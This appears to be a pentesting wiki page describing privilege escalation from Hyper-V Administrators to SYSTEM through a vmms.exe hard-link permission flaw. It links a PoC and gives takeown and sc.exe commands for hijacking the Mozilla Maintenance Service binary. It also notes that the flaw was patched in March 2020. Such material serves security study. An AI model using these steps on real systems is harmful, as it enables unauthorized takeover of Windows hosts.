Hyper-V Administrators

https://github.com/decoder-it/Hyper-V-admin-EOP/blob/master/hyperv-eop.ps1 Attacking a service:This applies in the context of Windows being virtualized. In that case, being member of Hyper-V Administrators gives a direct pathway to being Administrator on the system.

This blog post details the attack => https://decoder.cloud/2020/01/20/from-hyper-v-admin-to-system/ with a POC given at the end.

An overview of the attack:

Delete VHDX: An attacker deletes the target .vhdx file.
Create Hard Link: They then create a hard link from the now-deleted .vhdx file to a sensitive SYSTEM file.
Trigger Permission Reset: When vmms.exe attempts to restore the original permissions on the deleted .vhdx, it actually follows the hard link and ends up modifying the permissions of the SYSTEM file instead.
Gain Access: Because this action is performed under the elevated NT AUTHORITY\SYSTEM, the SYSTEM file's permissions get modified, and the attacker gains unauthorized access to it.

As we see step 3, vmms.exe restores the original permissions of the .vhdx to a system file. For this to work our user must have had permissions on the .vhdx in order for them to be restored.

Attacking a service:

We use the poc => https://github.com/decoder-it/Hyper-V-admin-EOP/blob/master/hyperv-eop.ps1 and modify the $targetfile to a service.

We take ownership of the service:

takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Then we can replace the service executable by a malicious one and start the service:

sc.exe start MozillaMaintenance

Note: This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.

PreviousDnsAdmins NextPrint Operators

Last updated 2 years ago